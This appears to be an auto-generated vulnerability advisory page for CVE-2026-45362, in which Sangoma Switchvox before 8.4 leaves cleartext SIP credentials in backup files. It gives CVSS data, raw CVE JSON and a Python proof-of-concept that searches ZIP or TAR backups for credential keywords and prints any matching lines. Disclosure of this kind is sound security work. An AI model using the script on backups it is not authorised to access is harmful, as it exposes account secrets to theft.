Security Vulnerability Report
中文
CVE-2026-45362 CVSS 3.2 LOW

CVE-2026-45362

Published: 2026-05-12 01:16:47
Last Modified: 2026-05-12 01:16:47
Source: [email protected]

Description

Sangoma Switchvox before 8.4 places cleartext SIP authentication credentials in a backup file.

CVSS Details

CVSS Score
3.2
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Sangoma Switchvox < 8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-45362: Sangoma Switchvox Cleartext SIP Credentials in Backup This script demonstrates how to extract cleartext credentials from a vulnerable backup file. """ import zipfile import tarfile import os import sys def extract_creds_from_backup(backup_path): """ Analyzes the backup file to find cleartext SIP credentials. """ print(f"[*] Analyzing backup file: {backup_path}") # Common patterns indicating SIP credentials keywords = ['secret=', 'password=', 'md5secret=', 'SIP '] found_creds = [] try: if zipfile.is_zipfile(backup_path): print("[+] Detected ZIP format backup.") with zipfile.ZipFile(backup_path, 'r') as z: for filename in z.namelist(): with z.open(filename) as f: content = f.read().decode('utf-8', errors='ignore') for line in content.splitlines(): if any(keyword in line for keyword in keywords): found_creds.append(f"{filename}: {line.strip()}") elif tarfile.is_tarfile(backup_path): print("[+] Detected TAR format backup.") with tarfile.open(backup_path, 'r:*') as t: for member in t.getmembers(): if member.isfile(): f = t.extractfile(member) if f: content = f.read().decode('utf-8', errors='ignore') for line in content.splitlines(): if any(keyword in line for keyword in keywords): found_creds.append(f"{member.name}: {line.strip()}") else: print("[-] Unknown backup format or file is corrupted.") return except Exception as e: print(f"[!] Error processing file: {e}") return if found_creds: print(f"[!] Found {len(found_creds)} potential credential entries:") for entry in found_creds: print(entry) else: print("[*] No cleartext credentials found or backup is encrypted.") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 poc.py <path_to_switchvox_backup>") sys.exit(1) backup_file = sys.argv[1] if not os.path.exists(backup_file): print(f"[!] File not found: {backup_file}") sys.exit(1) extract_creds_from_backup(backup_file)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45362", "sourceIdentifier": "[email protected]", "published": "2026-05-12T01:16:47.017", "lastModified": "2026-05-12T01:16:47.017", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sangoma Switchvox before 8.4 places cleartext SIP authentication credentials in a backup file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 3.2, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.4, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-312"}]}], "references": [{"url": "https://github.com/sangoma/security-switchvox/security/advisories/GHSA-mfm3-g35x-c9w8", "source": "[email protected]"}, {"url": "https://github.com/wb6vpm/switchvox-svb-plaintext-sip-credentials/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.